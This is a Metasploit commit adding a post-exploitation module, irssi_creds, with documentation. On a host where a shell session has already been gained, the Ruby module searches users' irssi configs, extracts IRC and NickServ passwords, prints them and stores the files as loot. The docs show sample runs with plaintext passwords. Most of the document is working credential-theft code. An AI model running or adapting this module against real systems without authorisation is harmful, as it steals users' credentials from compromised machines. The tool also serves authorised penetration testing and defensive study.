Land rapid7#8189, irssi password post gather module

Author: wvu

documentation/modules/post/multi/gather/irssi_creds.md

@@ -0,0 +1,32 @@
+## Vulnerable Application
+
+[irssi](https://irssi.org/) an IRC and chat client.
+
+This module was successfully tested against:
+
+- OSX 10.10.5 and IRSSI version 0.8.19
+
+## Verification Steps
+
+  1. Get a `shell` or `meterpreter` session on some host.
+  2. Do: ```use post/multi/gather/irssi_creds```
+  3. Do: ```set SESSION [SESSION_ID]```
+  4. Do: ```run```
+  5. If the system has readable configuration files containing irc passwords, they will be printed out.
+
+## Scenarios
+
+### OSX 10.10.5 and IRSSI version 0.8.19
+
+```
+msf post(irssi_creds) > run
+
+msf post(irssi_creds) > run
+
+[*] Finding ~/.irssi/config
+[*] Looting 1 files
+[+] Found a IRC password(s): chubbybunnies,meatpopcicle
+[+] IRC password(s) stored in /Users/jclaudius/.msf4/loot/20170410153351_default_192.168.10.99_irc.password_159907.txt
+[+] IRC password(s) stored in /Users/jclaudius/.msf4/loot/20170410153351_default_192.168.10.99_irc.password_967698.txt
+[*] Post module execution completed
+```

modules/post/multi/gather/irssi_creds.rb

@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Multi Gather IRSSI IRC Password(s)',
+      'Description'  => %q{
+        This module grabs IRSSI IRC credentials.
+      },
+      'Author'       => [
+        'Jonathan Claudius <jclaudius[at]mozilla.com>',
+      ],
+      'Platform'     => %w{bsd linux osx unix},
+      'SessionTypes' => %w{shell},
+      'License'      => MSF_LICENSE
+    ))
+  end
+
+  def run
+    print_status('Finding ~/.irssi/config')
+    paths = enum_user_directories.map { |d| d + '/.irssi/config' }
+    paths = paths.select { |f| file?(f) }
+
+    if paths.empty?
+      print_error('No users found with a ~/.irssi/config file')
+      return
+    end
+
+    download_passwords(paths)
+  end
+
+  # Example of what we're looking for in the config...
+  #
+  # ***Identify Password Example***
+  # autosendcmd = "/msg nickserv identify example_password ;wait 2000";
+  #
+  # ***Network Password Example***
+  #    password = "example_password";
+  #
+  def contains_passwords?(path)
+    data = read_file(path)
+    identify_passwords = data.scan(/\/\^?msg nickserv identify ([^\s]+)/)
+    network_passwords = data.scan(/^?password = "([^\s]+)"/)
+
+    passwords = identify_passwords.flatten + network_passwords.flatten
+
+    if passwords.any?
+      print_good("Found IRC password(s) of #{passwords.join(',')} in irssi config at #{path}")
+      return true
+    end
+
+    false
+  end
+
+  def download_passwords(paths)
+    print_status "Looting #{paths.count} files"
+
+    paths.each do |path|
+      path.chomp!
+      next if ['.', '..'].include?(path)
+
+      if contains_passwords?(path)
+        loot_path = store_loot(
+          'irssi config file',
+          'text/plain',
+          session,
+          read_file(path),
+          path,
+          'IRC Password'
+        )
+        print_good("irssi config with passwords stored in #{loot_path}")
+      end
+    end
+  end
+
+end